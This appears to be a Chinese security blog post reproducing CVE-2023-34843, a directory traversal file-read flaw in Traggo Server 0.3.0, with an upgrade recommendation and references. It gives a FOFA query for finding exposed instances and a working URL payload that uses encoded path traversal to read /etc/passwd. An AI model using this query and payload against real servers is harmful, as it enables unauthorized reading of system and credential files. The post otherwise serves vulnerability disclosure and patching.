声明:该网站大部分文章来自网络和日常学习笔记,文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任.

Traggo Server 任意文件读取漏洞(CVE-2023-34843)

0x01 漏洞描述及影响

Traggo Server 是一个基于标签的时间跟踪工具.攻击者可构造恶意请求目录遍历读取系统上的文件,造成敏感信息泄漏.

0x02 影响的版本

traggo 0.3.0

0x03 漏洞复现

F0FA:”Traggo”

图片

登录页长这酱子

图片

payload:
1
http://XXX/static/..%5c..%5c..%5c..%5cetc/passwd

图片

图片

0x04 修复建议

升级至最新版本.

参考链接:

https://github.com/rootd4ddy/CVE-2023-34843

https://avd.aliyun.com/detail?id=AVD-2023-34843

https://www.seebug.org/vuldb/ssvid-99707